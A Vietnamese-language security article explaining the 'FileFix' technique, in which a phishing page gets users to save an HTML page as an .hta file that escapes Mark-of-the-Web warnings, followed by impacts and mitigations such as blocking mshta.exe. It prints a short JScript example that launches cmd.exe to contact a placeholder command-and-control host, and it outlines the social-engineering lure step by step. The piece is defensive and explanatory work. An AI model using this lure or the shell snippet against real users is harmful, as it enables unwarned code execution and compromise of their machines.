Một phương thức tấn công mới, được đặt tên là “FileFix Attack”, đã xuất hiện, khai thác một lỗ hổng tinh vi nhưng cực kỳ nghiêm trọng trong cách các trình duyệt hiện đại như Google Chrome và Microsoft Edge xử lý nội dung web đã lưu. Kỹ thuật này khéo léo bỏ qua tính năng bảo mật Windows Mark-of-the-Web (MOTW), vốn thường đánh dấu các tệp đã tải xuống là có khả năng không an toàn và nhắc nhở người dùng bằng các cảnh báo trước khi thực thi. Bằng cách lợi dụng các loại MIME type cụ thể và hành vi của người dùng, kẻ tấn công có thể phân phối nội dung độc hại được thực thi mà không kích hoạt các biện pháp bảo vệ thiết yếu này.
Bỏ Qua Mark-of-the-Web (MOTW): Điểm Yếu Cốt Lõi
Cốt lõi của FileFix Attack nằm ở việc thao túng cách trình duyệt lưu nội dung HTML. Mark-of-the-Web (MOTW) là một tính năng bảo mật quan trọng của Windows, được thiết kế để bảo vệ người dùng khỏi các tệp không đáng tin cậy. Khi một tệp được tải xuống từ Internet hoặc một vùng không đáng tin cậy, Windows sẽ gán một thẻ đặc biệt vào siêu dữ liệu (metadata) của tệp đó. Thẻ này sẽ báo hiệu cho hệ điều hành và các ứng dụng khác (như trình duyệt web, Microsoft Office, hoặc các chương trình thực thi) rằng tệp này có nguồn gốc từ bên ngoài. Điều này thường dẫn đến các cảnh báo bảo mật, yêu cầu xác nhận từ người dùng hoặc kích hoạt các chế độ xem hạn chế (ví dụ: Protected View trong Microsoft Office) để ngăn chặn việc thực thi mã độc một cách tự động.
Tuy nhiên, khi người dùng lưu một trang web bằng cách sử dụng phím tắt Ctrl+S hoặc tùy chọn “Save as” trong các định dạng như “Webpage, Single File” (.mhtml) hoặc “Webpage, Complete” (.html), và nội dung được phục vụ với MIME type là text/html hoặc application/xhtml+xml, tệp kết quả sẽ không được gắn thẻ MOTW. Điều này hoàn toàn trái ngược với các loại MIME type khác như image/png hoặc image/svg+xml, nơi MOTW vẫn được áp dụng. Sự khác biệt này tạo ra một lỗ hổng logic: trình duyệt không coi hành động “lưu” nội dung HTML đã được hiển thị là một “tải xuống” tệp không đáng tin cậy, từ đó bỏ qua việc gắn thẻ bảo mật.
Kỹ Thuật Khai Thác và Kịch Bản Tấn Công
Chế Tạo File HTML Độc Hại
Kẻ tấn công khai thác lỗ hổng này bằng cách tạo ra các tệp HTML độc hại, thường được ngụy trang dưới dạng nội dung lành tính như “mã dự phòng” hoặc “tài liệu hướng dẫn”. Bên trong các tệp HTML này, chúng nhúng các script độc hại (chẳng hạn như JScript hoặc VBScript). Khi được lưu và đổi tên với phần mở rộng .hta (HTML Application), các tệp này có thể thực thi script mà không cần bất kỳ cảnh báo bảo mật nào, nhờ vào khả năng xử lý HTML và script nguyên bản của định dạng .hta.
Lợi Dụng Định Dạng HTA và Tương Tác Người Dùng
Sự tinh vi của cuộc tấn công được khuếch đại thông qua kỹ thuật xã hội (social engineering). Một kịch bản điển hình bao gồm một trang lừa đảo (phishing page) được thiết kế để bắt chước một dịch vụ hợp pháp, yêu cầu người dùng lưu “mã dự phòng” bằng Ctrl+S. Trang này có thể bao gồm các hướng dẫn rõ ràng để đặt tên tệp với phần mở rộng .hta, ví dụ như MfaBackupCodes2025.hta.
Khi người dùng lưu và thực thi file, JScript được nhúng bên trong sẽ chạy mà không gặp phải bất kỳ rào cản bảo mật nào. Ví dụ, một đoạn mã JScript đơn giản có thể được sử dụng để khởi chạy một shell lệnh và thực hiện các hành động cơ bản, chẳng hạn như kiểm tra kết nối với một máy chủ điều khiển (C2) từ xa:
var shell = new ActiveXObject("WScript.Shell");
shell.run("cmd.exe /c ping malicious-c2.com", 0, false);
Hơn nữa, kẻ tấn công có thể thao túng thẻ <title> hoặc các quy ước đặt tên tệp để ảnh hưởng đến tên lưu mặc định, khuyến khích người dùng đổi tên tệp theo cách tránh hậu tố .html tự động được thêm bởi trình duyệt, đảm bảo phần mở rộng .hta vẫn còn nguyên vẹn.
Tấn Công Qua Data URI
Ngay cả các Data URI với MIME type text/html cũng có thể bị vũ khí hóa. Điều này cho phép nội dung độc hại được mã hóa base64 được lưu mà không có MOTW, tạo thêm một rủi ro đáng kể. Kỹ thuật này mở rộng phạm vi tấn công, cho phép kẻ xấu nhúng trực tiếp các payload độc hại vào URL, sau đó được trình duyệt diễn giải và lưu mà không bị kiểm soát bảo mật.
Tác Động và Thách Thức Đối Với Bảo Mật
Tác động của cuộc tấn công này là rất đáng kể, vì nó bỏ qua một lớp bảo mật cơ bản của Windows được thiết kế để bảo vệ người dùng khỏi các tệp không đáng tin cậy. Khi MOTW bị vô hiệu hóa, các tệp .hta độc hại có thể thực thi các lệnh tùy ý trên hệ thống của nạn nhân, dẫn đến nhiều hậu quả nghiêm trọng như:
- Đánh cắp thông tin đăng nhập và dữ liệu nhạy cảm: Mã độc có thể thu thập thông tin cá nhân, tài khoản ngân hàng, thông tin xác thực và gửi về máy chủ của kẻ tấn công.
- Cài đặt mã độc bổ sung: Sau khi có quyền thực thi, kẻ tấn công có thể tải xuống và cài đặt các loại mã độc khác như ransomware, phần mềm gián điệp (spyware), hoặc các công cụ truy cập từ xa (RATs) để duy trì sự hiện diện.
- Kiểm soát hệ thống: Trong những trường hợp nghiêm trọng, kẻ tấn công có thể đạt được quyền kiểm soát hoàn toàn hệ thống của nạn nhân, sử dụng nó làm bàn đạp cho các cuộc tấn công tiếp theo hoặc tham gia vào các botnet.
Các nhà phòng thủ đối mặt với một thách thức lớn vì kỹ thuật này dựa vào tương tác của người dùng chứ không phải là một lỗ hổng trực tiếp trong trình duyệt hoặc hệ điều hành. Điều này khiến việc phát hiện và ngăn chặn trở nên phức tạp hơn, vì các công cụ bảo mật truyền thống có thể khó phân biệt giữa hành vi người dùng hợp lệ và hành vi bị thao túng.
Biện Pháp Phòng Ngừa và Giảm Thiểu Rủi Ro
Để đối phó với FileFix Attack và các biến thể tiềm năng, cần có một cách tiếp cận đa tầng bao gồm cả biện pháp kỹ thuật và nâng cao nhận thức:
Vô Hiệu Hóa mshta.exe
Một biện pháp giảm thiểu tức thì là vô hiệu hóa mshta.exe, một tệp nhị phân chịu trách nhiệm thực thi các tệp .hta. Điều này có thể được thực hiện thông qua Group Policy, các quy tắc tường lửa nâng cao (Windows Defender Firewall with Advanced Security), hoặc các chính sách kiểm soát ứng dụng (AppLocker, Windows Defender Application Control). Tuy nhiên, biện pháp này có thể không giải quyết được các sự điều chỉnh tiềm năng của cuộc tấn công sang các loại tệp khác có khả năng thực thi script, hoặc ảnh hưởng đến các ứng dụng hợp lệ có thể sử dụng mshta.exe.
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\taskkill.exe" /f
Lệnh này sẽ khiến cho mỗi khi mshta.exe được gọi, nó sẽ tự động bị tắt bởi taskkill.exe. Một giải pháp thay thế là sử dụng AppLocker hoặc WDAC để chặn hoàn toàn việc thực thi mshta.exe, hoặc chỉ cho phép nó chạy từ các thư mục đáng tin cậy.
Nâng Cao Nhận Thức Người Dùng
Đây là tuyến phòng thủ quan trọng nhất. Người dùng cần được huấn luyện về các kỹ thuật lừa đảo (phishing) và kỹ thuật xã hội. Các khóa đào tạo bảo mật cần nhấn mạnh:
- Cảnh giác với các yêu cầu lưu tệp: Đặc biệt là các trang web yêu cầu lưu “mã dự phòng” hoặc các tệp có vẻ bất thường.
- Kiểm tra phần mở rộng tệp: Luôn kiểm tra kỹ phần mở rộng của tệp trước khi mở, đặc biệt là các tệp có đuôi .hta, .js, .vbs, hoặc .exe.
- Hiểu về MOTW: Giải thích ý nghĩa của các cảnh báo bảo mật và tại sao không nên bỏ qua chúng.
Kiểm Soát Cấp Độ Trình Duyệt và Giải Pháp Bảo Mật Điểm Cuối
- Cải thiện kiểm soát trình duyệt: Các nhà phát triển trình duyệt cần xem xét các cơ chế cảnh báo mạnh mẽ hơn hoặc kiểm soát chặt chẽ hơn đối với cách nội dung đã lưu được gắn cờ và xử lý, đặc biệt là khi lưu các loại tệp có khả năng thực thi script. Việc thêm cảnh báo khi người dùng cố gắng lưu một trang web HTML thành một định dạng có khả năng thực thi như .hta có thể là một bước đi hiệu quả.
- Giải pháp Endpoint Detection and Response (EDR)/Extended Detection and Response (XDR): Triển khai các giải pháp EDR/XDR để giám sát hành vi trên điểm cuối. Các giải pháp này có thể phát hiện hành vi đáng ngờ của các tiến trình như mshta.exe, các lệnh shell bất thường hoặc kết nối mạng đến các máy chủ C2 độc hại ngay cả khi MOTW bị bỏ qua.
- Giám sát mạng: Các công cụ giám sát mạng và hệ thống phát hiện xâm nhập (IDS/IPS) có thể giúp phát hiện lưu lượng truy cập đáng ngờ từ các hệ thống bị nhiễm, đặc biệt là các kết nối đến các miền hoặc địa chỉ IP độc hại đã biết.
- Chính sách bảo mật chặt chẽ: Áp dụng các chính sách bảo mật chặt chẽ trong tổ chức, bao gồm việc hạn chế quyền thực thi các loại tệp không cần thiết hoặc chỉ cho phép thực thi các ứng dụng được phê duyệt.
FileFix Attack là một lời nhắc nhở rõ ràng rằng ngay cả các cơ chế bảo mật đã được thiết lập tốt như MOTW cũng có thể bị vượt qua thông qua sự kết hợp giữa sự khéo léo về kỹ thuật và thao túng tâm lý. Điều này đòi hỏi cả người dùng và các chuyên gia bảo mật phải luôn cảnh giác trước các chiến thuật lừa đảo tinh vi như vậy.
